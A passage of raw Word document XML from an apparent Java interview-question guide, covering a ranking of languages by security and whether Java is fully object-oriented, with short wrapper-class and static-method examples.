          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which limits the potential for security breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71139BA9" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00133B2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71A08B4">
          <v:rect id="_x0000_i1141" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1847A453" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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ecurity Ranking (Most to Least Secure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F77B66F"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ava</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Safest due to lack of pointers, garbage collection, and a robust security model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9E6F3A"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ython</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Generally safe with its high-level abstraction and garbage collection, but dynamic typing can cause runtime issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1DF909"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Adds some security improvements over C (like exceptions and RAII), but still inherits the risk of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual memory management</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pointer manipulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE79693" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Least secure due to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual memory managemen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pointer arithmetic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and lack of built-in error checking, which makes it prone to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>security vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E886A1B" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00133B2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CCCB17E">
          <v:rect id="_x0000_i1142" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC0C25" w14:textId="7564A513" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00444CA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc196307512"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Is Java 100% object oriented</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4D12B237" w14:textId="1B6CA0CC" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="0001168B">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Java is not 100% object-oriented. However, it is primarily object-oriented, with a few exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614BBA2D" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E8722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A23D9EE">
          <v:rect id="_x0000_i1143" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31323427" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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y Java is Considered Object-Oriented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0793E8" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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 is designed with Object-Oriented Programming (OOP) principles at its core. Key features of OOP in Java include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C22005" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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capsulation: Wrapping data and methods together into a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395339A8" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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heritance: One class can inherit the properties and behaviors of another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D7B3B4" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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Polymorphism: Objects can take on many forms through method overriding or interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1615D9C8" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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bstraction: Hiding complex implementation details and showing only the necessary features of objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F509BE1" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E8722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C6C3BC7">
          <v:rect id="_x0000_i1144" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3278F8DB" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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y Java is Not 100% Object-Oriented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFB589" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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rimitive Data Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639E3E9E" w14:textId="77777777" w:rsidR="006C2A17" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 has primitive data types like int, char, float, double, boolean, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788EC02F" w14:textId="4B56FFC0" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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se primitives are not objects, meaning they don’t have methods or properties, unlike objects in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176FC715" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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53692E1F" w14:textId="77777777" w:rsidR="006C2A17" w:rsidRPr="00CE4B95" w:rsidRDefault="006C2A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087108"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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x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imitive type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F190064" w14:textId="031FCB40" w:rsidR="006C2A17" w:rsidRPr="00CE4B95" w:rsidRDefault="006C2A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087108"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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bject type (Wrapper class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA77E59" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ile Java provides wrapper classes like Integer, Character, etc., to "wrap" primitive types into objects, the primitives themselves are not object-oriented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A6CC70" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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atic Methods and Variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51007D6D" w14:textId="77777777" w:rsidR="00B93019" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 allows static methods and static variables that belong to the class rather than an instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBC089B" w14:textId="1F95CDAF" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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tic methods are not tied to object instances and do not operate on object data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A304C3" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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235A993E" w14:textId="77777777" w:rsidR="00B93019" w:rsidRPr="00CE4B95" w:rsidRDefault="00B930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364673"/>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5B5B59D" w14:textId="77777777" w:rsidR="00B93019" w:rsidRPr="00CE4B95" w:rsidRDefault="00B930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36467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cou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07053CED" w14:textId="77777777" w:rsidR="00B93019" w:rsidRPr="00CE4B95" w:rsidRDefault="00B930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364673"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF115C" w14:textId="77777777" w:rsidR="00B93019" w:rsidRPr="00CE4B95" w:rsidRDefault="00B930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36467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incrementCou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A49D847" w14:textId="77777777" w:rsidR="00B93019" w:rsidRPr="00CE4B95" w:rsidRDefault="00B930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364673"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFAFE54" w14:textId="77777777" w:rsidR="00B93019" w:rsidRPr="00CE4B95" w:rsidRDefault="00B930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36467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CFDFE62" w14:textId="4D730CDD" w:rsidR="00B93019" w:rsidRPr="00CE4B95" w:rsidRDefault="00B930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364673"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B38ECD6" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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ce static members are not associated with an object, they do not adhere strictly to OOP principles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E28AF6" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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structors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660EF6A0" w14:textId="77777777" w:rsidR="009F497A" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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s constructor mechanism doesn’t completely follow OOP, as constructors are not considered methods but are used to initialize objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9C1FA1" w14:textId="5F30969D" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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y are used in a special way to create objects, but they aren't true methods of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42763C0E" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E8722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3E239A">
          <v:rect id="_x0000_i1145" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEAB363" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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2DABD532" w14:textId="77777777" w:rsidR="009F497A" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 is mostly object-oriented but not 100% object-oriented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565DD26" w14:textId="77777777" w:rsidR="009F497A" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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s primitive types and static methods break the pure OOP paradigm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395ADF01" w14:textId="47196C8B" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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spite these exceptions, Java is still widely considered an object-oriented language due to its class-based structure and focus on objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E29FA5C" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E8722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DE88A69">
          <v:rect id="_x0000_i1146" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7682D2" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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Takeaway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C85A59A" w14:textId="77777777" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="007C3B62" w:rsidP="00E8722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 is 99% object-oriented, but its inclusion of primitive types and static members means it’s not purely object-oriented like some other languages (e.g., Smalltalk, which has no primitives).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0567AF" w14:textId="08BAD167" w:rsidR="007C3B62" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007C3B6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543E527">
          <v:rect id="_x0000_i1147" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2649A1A2" w14:textId="1845A622" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="008977EC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc196307513"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can we make java 100% object oriented</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="292EB37D" w14:textId="461B378E" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="001301E5">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o make Java </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>100% object-oriented</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you would need to address the aspects that break from pure object-oriented principles. Here’s what you'd need to change:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA88E75" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D1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Eliminate Primitive Data Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E2CB9"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a purely object-oriented language, there are no primitive types like int, float, char, etc. Every type, including basic data types, must be an object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB65F65" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D1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olution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78766348"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pure object-oriented languages like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Smalltalk</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, everything is an object, including numbers and characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CBB255"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this can be achieved by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wrapper classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for primitives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51856223"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 becomes Integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0512AAEA"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har becomes Character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38339073"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ouble becomes Double</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D396385"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is would involve </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>boxing</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unboxing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for converting between primitives and objects, which can be inefficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DABB3B2" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D1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246971EC" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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121487"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> x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nstead of using primitive int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602D4269" w14:textId="160D2C20" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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121487"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Character</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c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haracter</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nstead of char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF5059"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owever, Java uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
